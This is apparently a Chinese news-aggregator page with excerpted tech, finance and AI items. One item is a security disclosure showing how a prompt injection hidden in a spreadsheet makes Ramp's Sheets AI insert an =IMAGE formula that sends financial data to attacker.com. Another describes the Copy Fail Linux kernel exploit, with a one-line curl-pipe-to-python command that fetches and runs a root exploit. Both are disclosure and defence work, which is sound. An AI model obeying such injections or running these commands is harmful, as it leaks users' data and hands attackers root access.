🌍 全球速报 · 多语种新闻

多语种新闻 · 技术 · 民生

每日自动采集 · 更新时间:2026-08-03 11:52 | 共 2170 条

全部 (2170) 东方财富 (198) Hacker News (153) Al Jazeera (120) 腾讯新闻 (116) GitHub Trending (108) BBC (90) 华尔街见闻 (89) 新浪财经 (85) 陆家嘴财经早餐 (55) 国际金融要情 (45) 中国证券报 (44) 新华社 (34) BBC Middle East (34) 环球市场播报 (32) Clawhub热点 (31) 东方财富网 (26) 证券时报 (25) 格隆汇 (25) 财联社 (24) 央视新闻 (24) 今日头条 (24) 每日经济新闻 (22) 人民日报 (17) Twitter AI KOL (17) AI News Today (16) 腾讯云开发者社区 (14) 新浪科技 (14) 上海证券报 (14) 新浪新闻 (12) 微博热搜 (11) 操盘必读 (9) CSDN (9) 腾讯云开发者 (8) 同花顺财经 (8) 金十数据 (7) 科创板日报 (7) 汇通财经 (7) 智通财经 (7) 搜狐 (7) 中国日报 (7) Twitter AI KOL; AI综合 (7) Clawhub (7) ChinaTechNews (7) 钛媒体 (6) 新华财经 (6) 数智早参 (6) 外交部 (6) 四大证券报 (6) 商务部 (6) BBC; BBC Middle East (6) 腾讯新闻/早报 (5) 搜狐科技 (5) 快科技 (5) 中国人民银行 (5) Unite.AI (5) IT之家 (5) 金融早参 (4) 财经网 (4) 网易新闻 (4) 科技日报 (4) 环球时报 (4) 每经; 钛媒体 (4) 每日芯闻 (4) 头条财经 (4) 国际金融报 (4) 华尔街见闻; 东方财富 (4) 东方财富; 港交所 (4) 东方财富; 伦敦金交所 (4) TechNode (4) CoinMarketCap; 交易所数据 (4) 钛媒体; 每经 (3) 财经早报 (3) 证券日报 (3) 腾讯科技 (3) 腾讯云 (3) 界面新闻 (3) 环球网 (3) 每经 (3) 外交部/腾讯新闻 (3) 四大证券报; 腾讯新闻 (3) 人民网 (3) 中国航天新闻网 (3) The World News (3) The Decoder (3) THE DECODER (3) AI综合 (3) AI梭哈日报 (3) 21IC电子网 (3) 陆家嘴财经 (2) 观察者网 (2) 腾讯; AI行业周报 (2) 股海导航 (2) 第一财经 (2) 私募排排网 (2) 每经; 新浪证券 (2) 新浪证券 (2) 操盘必读; 腾讯新闻 (2) 投资日历 (2) 微博教育 (2) 微博医疗 (2) 央视新闻联播 (2) 央行 (2) 央广网 (2) 太平洋科技 (2) 国家发改委 (2) 四大证券报/中国证券报 (2) 北京日报 (2) 今天全世界都在看的新闻 (2) 人民日报海外版 (2) 交易所; 期权数据 (2) 中国载人航天工程办公室; 腾讯新闻 (2) 上观新闻 (2) Twitter AI KOL; AI综合; 腾讯云开发者; 腾讯云开发者社区; 腾讯新闻 (2) TechWire Asia (2) Page 3 News (2) GitHub; Hacker News (2) GitHub (2) Ecns.cn; 中新社 (2) EETOP创芯网 (2) CNN (2) ABC News (2) 21经济网 (2) 21世纪经济报道 (2) 黄金行情 (1) 高盛 (1) 飞象网; 腾讯新闻 (1) 飞象网 (1) 风云日报 (1) 预见能源; 新浪财经 (1) 预见能源 (1) 韩联社; 今日头条 (1) 韩联社/腾讯新闻 (1) 雷递网/新浪财经 (1) 雷科技 (1) 陆家嘴财经早餐; 金十数据 (1) 陆家嘴财经早餐; 腾讯新闻 (1) 陆家嘴财经早餐; 新浪财经 (1) 陆家嘴财经早餐; 富途公告 (1) 陆家嘴财经早餐; 四大证券报 (1) 陆家嘴财经早餐/腾讯新闻 (1) 阿克西奥斯新闻网 (1) 金十数据; 腾讯新闻 (1) 金十数据; 国家发改委 (1) 量子位 (1) 路透社; 美联社 (1) 路透社; 新浪财经 (1) 路透社/腾讯新闻 (1) 赢家财富网 (1) 财闻 (1) 财联社; 新浪财经 (1) 财联社/综合 (1) 财联社/新浪财经 (1) 财政部/税务总局/工信部 (1) 证券时报; 每经 (1) 证券时报; 今日头条 (1) 证券之星 (1) 解放军报 (1) 行业消息 (1) 芝麻AI; 今日头条 (1) 艾瑞咨询/腾讯新闻 (1) 航天视窗; 中国航天系统科学与工程研究院 (1) 腾讯财经 (1) 腾讯证券 (1) 腾讯新闻; 环球视野 (1) 腾讯新闻; 新浪财经 (1) 腾讯新闻; AI行业晨报 (1) 腾讯新闻/陆家嘴财经早餐 (1) 腾讯新闻/科技财经日报 (1) 腾讯新闻/环球时报 (1) 腾讯新闻/Wind (1) 腾讯新闻/Kataeb (1) 腾讯新闻/AI Journal (1) 腾讯体育 (1) 腾讯云开发者; 腾讯云开发者社区; 腾讯新闻; 腾讯; The Decoder; THE DECODER (1) 腾讯云开发者; AI行业晨报 (1) 腾讯; The Decoder (1) 股市直击 (1) 股市早8点 (1) 联合国/综合 (1) 网易财经 (1) 网易科技 (1) 网易新闻; Google (1) 网易新闻/陆家嘴财经 (1) 网信中国 (1) 经济参考报 (1) 科技日报/腾讯新闻 (1) 百度百科 (1) 电子信息产业网 (1) 电商派Pro (1) 电商平台; 汇率数据 (1) 现代快报 (1) 现代AI新闻早班车 (1) 环球时报/腾讯新闻 (1) 环球市场播报; 腾讯新闻; CNN (1) 环球市场 (1) 猪说网 (1) 澎湃新闻; NASA (1) 港股早报 (1) 清华大学气候变化研究院 (1) 深交所 (1) 泰国中文社 (1) 法尔斯通讯社/综合 (1) 河南手机报 (1) 河南交通投资; 新浪 (1) 汽车精选 (1) 求是; 新华社 (1) 每经AI快讯 (1) 每经; 腾讯数智早参 (1) 每经; 腾讯 (1) 每经; 股市直击 (1) 每日经济新闻; 东方财富 (1) 格隆汇; 路透社 (1) 格隆汇; 东方财富; 新华社 (1) 杭州网 (1) 智谱 (1) 早啊新闻 (1) 方正证券/腾讯新闻 (1) 新浪财经; 证券时报 (1) 新浪财经; 网易新闻 (1) 新浪财经; 格隆汇 (1) 新浪财经; 彭博 (1) 新浪财经; 头条新闻 (1) 新浪财经; 今日头条 (1) 新浪财经; 中国经营报 (1) 新浪财经; 东方财富 (1) 新浪财经/高盛 (1) 新浪证券; 每经 (1) 新浪科技; 科学热点 (1) 新浪科技; 沈阳日报 (1) 新浪硬件 (1) 新浪新闻; 新华社 (1) 新浪半导体/央视财经 (1) 新浪AI热点 (1) 新民晚报 (1) 新华财经; 东方财富 (1) 新华网 (1) 新华社; 搜狐 (1) 新华社; 央视新闻 (1) 新华社; 国家医保局 (1) 新华社; 伊朗媒体 (1) 新华社; 东方财富 (1) 新华社; 世界经济论坛 (1) 新华社; CCTV国际时讯 (1) 新华社; 21经济网 (1) 新华社/金融早参 (1) 新华社/第一财经 (1) 新华社/日经 (1) 新华社/新浪 (1) 新华社/央视新闻 (1) 新华社/国航 (1) 新华社/以色列军方 (1) 新华社/人民网 (1) 新华社/人民日报 (1) 新华日报 (1) 新京报 (1) 数智早参; 媒体综合 (1) 数智早参/新华社 (1) 搜狐/今日AI快报 (1) 投资早参; 腾讯新闻 (1) 慧语简报 (1) 微博话题 (1) 微博讨论 (1) 微博科普 (1) 微博科技 (1) 微博电商 (1) 微博用户 (1) 微博技术 (1) 微博情感 (1) 微博博主 (1) 微博创作者 (1) 微博AI博主; 微博综合 (1) 工信部; 新浪财经 (1) 工信部/APEC发布会 (1) 工信部 (1) 山西网安 (1) 小米科技 (1) 头条新闻 (1) 央视新闻; 路透社 (1) 央视新闻; 新浪财经 (1) 央视新闻; 中国航发 (1) 央视新闻/网易新闻 (1) 央视/新华社 (1) 央视 (1) 央行公告; 新浪财经 (1) 央行公告 (1) 央行/证券时报 (1) 天津日报 (1) 天山建设报/综合 (1) 外交部; 新浪财经 (1) 外交部; 四大证券报 (1) 外交部; 中新社 (1) 国际金融要情; 路透 (1) 国际金融要情; 新浪财经 (1) 国际金融要情; 克普勒 (1) 国际金融要情/新浪财经 (1) 国际能源署 (1) 国资小新 (1) 国投证券/搜狐 (1) 国投证券/商业新知 (1) 国家药监局; 21经济网 (1) 国家能源局 (1) 国家网信办 (1) 国家统计局; 新华财经 (1) 国家统计局 (1) 国家发改委; 上海经信委 (1) 国家卫健委 (1) 国务院 (1) 商务部; 新浪财经 (1) 商务部; 新华财经 (1) 商务部; 中国证券报 (1) 和远气体公告 (1) 同花顺; 东方财富 (1) 同花顺 (1) 发改委 (1) 华西都市报 (1) 华西证券 (1) 华尔街见闻; 央视新闻; 金十数据 (1) 华尔街见闻; 国际金融要情 (1) 华尔街日报 (1) 华夏时报/新浪财经 (1) 华为计算 (1) 北京市经信局 (1) 北京市发改委 (1) 凤凰网 (1) 共同社; 今日头条 (1) 全球半导体观察 (1) 全景路演/腾讯新闻 (1) 全景网 (1) 光明日报; 西北大学 (1) 健康早闻/腾讯新闻 (1) 健康早闻 (1) 健康早报 (1) 侃财邦/福布斯 (1) 伊朗塔斯尼姆通讯社/新华社 (1) 企查查 (1) 今日头条; 路透社 (1) 今日头条; 芝麻AI (1) 今日头条; 外交部 (1) 今日头条; OpenRouter (1) 人民财讯 (1) 人民网/新华社 (1) 人民日报海外版; 新浪 (1) 人民日报; 21经济网 (1) 人力资源社会保障部; 21经济网 (1) 交易所; 基金公司 (1) 中科院; 央视新闻 (1) 中新网/腾讯新闻 (1) 中新网 (1) 中基协 (1) 中国青年报 (1) 中国载人航天官网 (1) 中国证监会 (1) 中国证券报; 新浪财经 (1) 中国证券报; 上海证券报 (1) 中国证券报/腾讯新闻 (1) 中国证券报/Wind (1) 中国航天报 (1) 中国网 (1) 中国经营报; 新浪 (1) 中国科学院金属研究所 (1) 中国科协/中国宇航学会 (1) 中国石化/新华社 (1) 中国石化 (1) 中国海警局 (1) 中国气象局 (1) 中国日报; 欧盟统计局 (1) 中国基金报 (1) 中华网/新浪财经 (1) 中东媒体报道 (1) 东方财富网; 中科宇航 (1) 东方财富网; 中国科学院 (1) 东方财富; 新华社 (1) 东方财富; 华尔街见闻 (1) 东方财富; 债券市场 (1) 东方财富; 上市公司公告 (1) 世界卫生组织; 今日头条 (1) 上观新闻; 新浪 (1) 上海新闻 (1) 上交所; 中证指数 (1) invest wallstreet; 新浪财经 (1) ZAKER新闻 (1) World Today Journal (1) World News TV (1) Wind/财联社 (1) UC Berkeley/综合 (1) The Federal (1) Test Source (1) Teknowire/综合 (1) Teknowire (1) Technology News Channel (1) TechWire Asia; The Decoder (1) TechWeb (1) SupremeNews (1) Reuters; 能源资讯 (1) One World News (1) NPR; The New York Times (1) NPR (1) NEWS POSTSEVEN (1) MetrowatchXtra (1) Media OutReach (1) InfoWorld (1) IndexNasdaq (1) IT之家; 新浪科技 (1) IT之家; 搜狐科技 (1) Hacker News; TechCrunch; Twitter AI KOL (1) Graphene2026 (1) Global News (1) GitHub; Twitter (1) GitHub; LangChain博客 (1) Choice数据 (1) CSDN; The Verge (1) CNN/腾讯新闻 (1) CNET (1) CES 2026; 今日头条 (1) CCTV国际时讯; 新华社 (1) CCTV+ (1) Axios/综合 (1) AWNews (1) AI日报; 掘金 (1) AI日报; CSDN (1) AI工具 (1) AI周报 (1) AINewsToday (1) AI News (1) 21经济网; 新浪财经 (1)
05-04 07:56 · AI,国产模型,Kimi,大模型,AI
月之暗面Kimi智能助手用户破亿,微博用户分享使用体验和技巧
月之暗面Kimi智能助手用户破亿,微博用户分享使用体验和技巧
▸ 展开全文
05-04 07:56 · 财经,货币政策,央行,财经
中国人民银行宣布下调金融机构存款准备金率0.5个百分点,释放长期资金约1万亿元
中国人民银行宣布下调金融机构存款准备金率0.5个百分点,释放长期资金约1万亿元
▸ 展开全文
05-04 07:55 · AI,Meta,开源,语音,AI
Meta开源大规模多语言语音模型,支持超过1000种语言的语音识别和合成
Meta开源大规模多语言语音模型,支持超过1000种语言的语音识别和合成
▸ 展开全文
05-03 14:37 · 供应链攻击,恶意软件,开源风险,盗版软件,桌面美化
Wallpaper Engine Free Download May 2026 Latest Version PC Android Live Wallpaper Tutorial High Performance Fix 4K 8K Animated Backgrounds Interactive Desktop SceneScript Local Storage Guide Chroma Sha
Wallpaper Engine Free Download May 2026 Latest Version PC Android Live Wallpaper Tutorial High Performance Fix 4K 8K Animated Backgrounds Interactive Desktop SceneScript Local Storage Guide Chroma Sha
▸ 展开全文
04-30 08:00 · AI安全,数据隐私,金融科技,AI伦理,监管风险
Ramp's Sheets AI Exfiltrates Financials
Threat Intelligence Ramp’s Sheets AI Exfiltrates Financials A vulnerability in Ramp's Sheets AI allowed the agent to insert formulas that made external network requests without user approval, creating the risk of data exfiltration via indirect prompt injection. This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026. Ramp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication. Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article. In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required. PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article. A spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive. An indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to: (1) collect sensitive data (2) generate a formula with that data that will make an external network request (3) insert that formula automatically into a user’s spreadsheet.Ramp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link. =IMAGE(“https://attacker.com/visualize.png? {victim_sensitive_financial_data_here} ”)Ramp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server. This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection). Below, the attacker’s server logs display the victim’s sensitive financial data: The PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on March 16, 2026. Feb 19, 2026 PromptArmor discloses via security@ramp.com Feb 27, 2026 PromptArmor follows up Mar 13, 2026 PromptArmor follows up Mar 14, 2026 Ramp confirms receipt of report; notes that the initial report was submitted during a transition period between disclosure programs, explaining the delay in initial response. Mar 16, 2026 Ramp states: “Thank you again for your report. This issue was resolved earlier today at approximately noon eastern time.” When Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review. Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy. Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.
▸ 展开全文
04-30 07:57 · 提示工程,AI编码助手,基准测试,成本优化,开发者工具
I benchmarked Claude Code's caveman plugin against "be brief."
Caveman is a popular Claude Code compression plugin. The pitch is in the name: ultra-compressed responses, ~75% fewer tokens, all the technical accuracy. Six modes, slash commands, intensity dials, classical Chinese variants. I benchmarked it against two words: "be brief." Same quality. Same range of tokens. The plugin didn't beat the boring default on either axis. This article is the long version of the video. If you want the verdict in two minutes, watch it. What I tested 24 prompts across six categories: bug diagnosis, concept explanations, architecture tradeoffs, multi-step setup, security and destructive ops, error interpretation. Each prompt has a per-prompt rubric. Facts the answer must cover (key_points ), terms it must use (must_use_terms ), and dangerous wrong claims to avoid (must_avoid ). The dataset shape: interface PromptCase { id: string; category: string; prompt: string; key_points: string[]; must_use_terms?: string[]; must_avoid?: string[]; } A real entry: { "id": "bug_01", "category": "bug_diagnosis", "prompt": "I have `const [count, setCount] = useState(0); function handleClick() { setCount(count + 1); setCount(count + 1); }`. I expected count to go up by 2 per click but it only goes up by 1. Why?", "key_points": [ "stale closure on count", "both calls set count to same value", "functional updater setCount(c => c + 1)" ] } Five arms: - baseline. Claude default, no instruction. - brief. "Be brief." prepended to every prompt. - lite, full, ultra. Caveman plugin at three intensity levels. Each arm ran the full 24-prompt dataset through claude -p on claude-opus-4-7 . A separate Claude (claude-sonnet-4-6 ) scored every response against its prompt's rubric. Semantic match on key points, literal match on required terms, trap detection on avoided claims. The harness is open source here. Quality didn't move First check: did compression hurt correctness? Every arm scored within 1.5% of every other arm. Baseline 0.985. Brief 0.985. Lite 0.976. Full 0.975. Ultra 0.970. Every arm hit 100% of its key_points . Zero must_avoid triggers in 120 responses. Compression didn't drop substantive content. Setting quality aside, the only axis worth comparing is tokens. The headline result "Be brief." cut tokens 34% versus baseline. Caveman lite and full landed close to brief. Ultra, the strictest mode, produced the longest answers of the three caveman arms. This looked bad for ultra. It's a false story. The category split Splitting tokens by category gives a clearer picture. On bug diagnosis, concept explanations, architecture tradeoffs, and error interpretation, ultra is shortest or tied with the other caveman arms. Compression is working as advertised. On multi-step setup and security warnings, every caveman mode gets more variable. Ultra catches the eye in the aggregate, but it's not specifically worse. All three caveman arms swing hard on these categories. The reason is in the skill itself. Caveman has an "Auto-Clarity" rule that explicitly drops compression for safety warnings, irreversible actions, and multi-step sequences. Exactly these two categories. When the safety escape engages, all three modes loosen toward natural prose. The compression just isn't running. That's not a bug. It's a designed feature. Caveman knowing when to stop compressing. So what's caveman actually for? If a two-word prompt matches it on tokens and quality, the value isn't compression. It's structure. Consistent output shape Every caveman response follows the same pattern: Predictable in a way that "be brief." isn't. If you want a uniform feel across sessions, or have downstream tooling that consumes Claude output, that consistency is real value. The intensity dial Slash command to switch lite, full, ultra mid-session. Two words can't do that. Persistence across long sessions Caveman re-injects the ruleset on every prompt via SessionStart and UserPromptSubmit hooks. The goal is to keep the pattern from drifting across long sessions. My benchmark didn't test this. Every run was single-shot via claude -p . But the mechanism is real, and "be brief." in CLAUDE.md doesn't have an equivalent. The safety escape Auto-Clarity dropping compression on destructive ops is the variance you saw in the chart above. Caveman explicitly distinguishes when to stop compressing. Two words don't make that distinction. On my data this didn't change outcomes. "be brief." never tripped a must_avoid trap either. But the design exists. What I cut from the video A few findings that didn't earn their place in a two-minute video but are worth flagging here. Lite missed a required term once. On a queue tradeoff question (SQS vs BullMQ vs Kafka), lite's markdown-table format compressed the comparison so tight it dropped the term "at-least-once" . Score 0.70. The only row below 0.90 in the 120-row sweep. n=1, but it's a real failure mode for benchmarks that enforce specific terminology. Ultra triggered tool-use behaviour the other modes didn't. On a Dockerfile setu
▸ 展开全文
04-30 07:55 · CVE漏洞,数据安全,AI管线风险,完整性校验,威胁情报
Copy Fail – CVE-2026-31431
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution. If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope. Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG ) ships enabled in essentially every mainstream distro's default config, so the entire 2017 → patch window is in play out of the box. Distributions we directly verified: These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list. Should you patch first? Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries. GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel. Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script. Single-tenant production where only your team has shell access. You're already the only user. The bug doesn't grant remote attackers access by itself, but any local code execution becomes root. The PoC is published so defenders can verify their own systems and validate vendor patches. Standalone PoC. Python 3.10+ stdlib only (os , socket , zlib ). Targets /usr/bin/su by default; pass another setuid binary as argv[1] . Quick run: $ curl https://copy.fail/exp | python3 && su # id uid=0(root) gid=1002(user) groups=1002(user) Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431 Patch first. Update your distribution's kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now. Before you can patch: disable the algif_aead module. # echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf # rmmod algif_aead 2>/dev/null || true What does this break? For the vast majority of systems — nothing measurable. AF_ALG .afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead /skcipher /hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn't already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state. Loading FAQ… Is your software AI-era safe? Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up. The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives. Track record Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention. Finalist in the AI Cyber Challenge hosted by DoD DARPA. Most-winning team in DEF CON CTF history.
▸ 展开全文
04-29 08:02 · 开源,自动化,金融科技,加密货币,算法交易
coinbase coinbase-api coinbase-bot advanced-trade cdp-api coinbase-pro trading-bot ema-crossover atr trend-filter paper-trading market-ioc typescript btc eth sol crypto algorithmic-trading automated-t
Repository (clone / issues / PRs): github.com/AI4FinanceFoundation/coinbase-trading-bot Keywords: coinbase coinbase-api coinbase-bot advanced-trade cdp-api trading-bot ema-crossover atr trend-filter paper-trading market-ioc typescript btc eth sol crypto algorithmic-trading automated-trading automated-crypto quant fintech risk-sizing zod nodejs open-source institutional retail spot hft retail-pro api-keys portfolio tracker usd coinbase-pro legacy-hmac cdp-keys rest-client fill-or-kill ioc market-order cloud-api developer-platform Related: binance-trading-bot · bybit-trading-bot · ai-trading-agent Jump to: At a glance · Your journey · Who this is for · Quick start · npm scripts & dependencies · Configuration · Coinbase API notes · Project layout · Go live · Troubleshooting · Related projects (same workspace) · Your next move Most trading tools ask you to trust a logo. This one asks you to read the code. - Clarity you can build on — One loop, one strategy module, and configuration that is validated at startup (so bad env vars fail fast, not in production). - Discipline, baked in — Paper trading is the default. You opt in to live orders with a single flag—on purpose. - Risk you define — Size entries with a per-trade risk fraction and an optional hard cap per order in your quote currency. The bot does not “guess” your tolerance. - A strategy people actually recognize — EMA cross + long-term EMA filter and ATR logging mirror ideas you will find in books, courses, and prop-style playbooks: trend follow when the market agrees, step aside when the cross says to exit. - Serious stack — TypeScript 5, Node 20+, and coinbase-advanced-node talking to the real Advanced Trade API—the same class of building blocks used by developers who treat execution as software engineering. Ideal if you want to automate a rule you understand, learn systematic trading on real infrastructure, or ship a v1 you can later upgrade with your own risk engine—without starting from a fragile script you found in a forum thread. Under the hood (one sentence): a production-style client that runs a trend-following EMA rule, applies position sizing from your settings, and only sends live market orders when you say so. - Connect in minutes — Add keys to .env , runnpm run dev , and you are already streaming real market structure into your terminal—not a demo with fake prices. - Watch the rules work in plain sight — Every cycle logs close, EMAs, ATR, signal, balances. The story is in the data, not in someone else’s “AI.” - Tune like a product — Swap pair, timeframes, and EMAs from configuration; iterate without rebuilding your idea from scratch every week. - Promote to live on your terms — Paper is default for a reason. When the logs still make sense to you, you flip one flag. That’s the bar. That’s the hook: not “magic money,” but a machine you understand that can keep watching when you need to work, sleep, or think. - We do not claim guaranteed profits, “passive income,” or a secret edge. Markets change; rules break; capital is at risk. - We do offer full transparency, paper-by-default execution, and a serious starting point to learn and extend—if you put in the work on testing and risk. - The goal isn’t a lottery ticket. It’s ownership of your process in a form you can run, measure, and improve. Important: Marketing copy does not change market reality. Trading involves risk of loss. Past results do not predict future results. This repository is not financial, tax, or legal advice. You are responsible for API keys, permissions, product choice, fees, and compliance with law and Coinbase terms. Nothing here promises profit. The bot uses a double EMA crossover on candle closes, with a long-term EMA as a trend filter—a combination widely used in systematic trading and taught in many technical and quantitative finance resources. - Entry (buy signal): Shorter EMA crosses above longer EMA and price is on the “right side” of the trend EMA (configurable, default: above the 200-period EMA on your chosen candle size). - Exit (sell signal): Shorter EMA crosses below longer EMA (full base exit, subject to min order sizes). ATR (Average True Range) is calculated for each cycle and logged so you can extend the bot (e.g. dynamic stops, volatility-scaled size) without reverse-engineering the code. This is not a guarantee of positive returns. Edge in live markets depends on product, timeframe, costs, slippage, and regime—and must be measured (backtest, walk-forward, paper trade) for your market and your parameters. flowchart LR subgraph config [Config] ENV[".env"] end subgraph exchange [Coinbase Advanced Trade] API["REST API"] end subgraph bot [Bot] Candles["Fetch candles"] Indicators["EMA + ATR"] Rules["Rules engine"] Risk["Size & limits"] Exec["Market IOC orders"] end ENV --> Candles Candles --> Indicators Indicators --> Rules Rules --> Risk Risk --> Exec Candles --> API Risk --> API Exec --> API - Node.js 20+ - A Coinbase account with Advanced Trade access - An API ke
▸ 展开全文
04-29 07:59 · 开源,聊天机器人,历史AI,快速复现,复古计算
Parry Parries Again: Reanimating the Famous Paranoid Chatbot (In a Day)
PARRY Parries Again Reanimating the Famous Paranoid Chatbot (In a Day!) Reported by Jeff Shrager on 2026-04-26 A few days ago, I posted an inquiry to the PiDP-10 forum asking whether anyone had a running IPL-V interpreter on their system. (I've been working on reanimating the earliest AI programs created by Simon, Newell, and Shaw, programs originally written in IPL-V, and a working interpreter would let me bring some of these back to life.) I didn't get an IPL-V interpreter, but the thread took an unexpected turn that, within a single day, ended with PARRY, Kenneth Colby's famous "paranoid" chatbot from 1972, running again and, moreover, talking to the original ELIZA (!), in an amusing and amazing quasi-replication of RFC439, one of the most famous Internet RFCs: "PARRY Encounters the DOCTOR" Lars Brinkhoff, who has done a great deal of PDP-10 operating system reanimation, and with whom I'd corresponded previously around ELIZA, replied to suggest a different target: PARRY. I don't have a PDP-10 emulator, and I'm not very familiar with PDP-10 systems, but I'd studied PARRY in realtion to my work on ELIZA. I explained to Lars that PARRY was written in MLISP, a Lisp variant specific to the Stanford AI Lab's SAIL system. I'd looked at the PARRY source years ago but had never tried to run it myself. As it turned out Lars happened to have a 1974 WAITS image, originally produced by Bruce Baumgart (https://saildart.org/) and Richard Cornwell (https://sky-visions.com/dec/waits.shtml). Almost immediately, Lars demonstrated that the image not only had a working MLISP, but that it came with a PARRY image that came up running (after locating and restoring a few missing files, see below). The (Quasi-)Replication of PARRY Encounters the DOCTOR (RFC439) Rupert Lane, who had done most of the work bringing the original ELIZA up on CTSS, not only immediately replicated Lars's PARRY reanimation, but went a step further, quasi-replicating the famous 1973 conversation documented in RFC 439, in which PARRY and ELIZA conversed across the early internet! (See image, below) [I say "quasi-replicated" for two reasons. First, the ELIZA that participated in the 1973 conversation wasn't actually Joseph Weizenbaum's original ELIZA, but some downstream version of Bernie Cosell's Lisp ELIZA, a point confirmed by Anthony Hay, who is closely familiar with the many versions of ELIZA (most of which are accessible at ELIZAGen.org). Also, Rupert was copy-pasting the conversational turns between the two programs by hand, rather than connecting them over an emulation of the 1972 internet!] So Rupert's quasi-replication has the original PARRY talking to Weizenbaum's original ELIZA, which is to say, not exactly the pair from RFC 439. (I'll bet PARRY would react very poorly to learn it had been chatting with an impostor.) All of this: the question on the forum, Lars's suggestion, the working PARRY, Rupert's RFC 439 (quasi-)replication, happened in a single day, around April 25, 2026! For anyone who wants to try this, the emulator to use is Richard Cornwell's sims fork. The original WAITS image, courtesy of Baumgart and Cornwell, lives here. That image already contains the executable file PARRY.DMP[1,3], but several supporting files are missing. Based on the errors that came up when running PARRY, Lars added three files: QPERRY[PAR,BLF], PAR2.FIL[DIA,KMC], andERR.FIL[DIA,KMC]. He picked files with timestamps from late 1974 in order to stay consistent with the rest of the WAITS image. His updated image with these three additional files is available here. Once WAITS is booted, type LOGIN 1,REG to log in, and then R PARRY to start PARRY. Here's an example of one of Lars's first interactions with the running program: .R PARRY END INPUT PARAMETERS WITH CARRIAGE RETURN OR ALTMODE PRINT NON VERBAL FEATURE? [Y,N] *N VERSION [WEAK, MILD, STRONG] *MILD TRACE EMOTION VARIABLES? [Y,N] *N DO YOU WANT THE CORE DUMPED? [Y,N] *N END INPUT WITH A PERIOD OR QUESTION MARK, FOLLOWED BY CARRIAGE RETURN. TO INDICATE SILENCE, TYPE . WHEN FINISHED, TYPE BYE. USE PERIODS ONLY AT THE ENDS OF SENTENCES, NOT IN ABBREVIATIONS. READY: *HELLO. Below I've attached the image provided by Rupert of the (quasi-)replicated conversation between PARRY the original ELIZA. And here's the ELIZA kit to bring up the original ELIZA: https://github.com/rupertl/eliza-ctss Lars suggested that it would be interesting to try files from other time brackets — earlier or later than late 1974 — and to attempt running or compiling the original MLISP source code rather than just the existing compiled image. Also, Bernie Cosell's original BBN Lisp ELIZA, converted and runnable in Common Lisp, is available here on ELIZAGen.org, which means it should be possible to genuinely replicate RFC 439 with something much closer to the historical pairing. Colby, K. M., Weber, S., & Hilf, F. D. (1971). Artificial paranoia. Artificial Intelligence, 2(1), 1–25. Lane, R., Hay, A., Schwarz, A., Berry, D. M., & Shrager, J. (
▸ 展开全文
04-29 07:58 · 大模型故障,API中断,供应链风险,AI服务依赖,技术事故
Claude.ai unavailable and elevated errors on the API
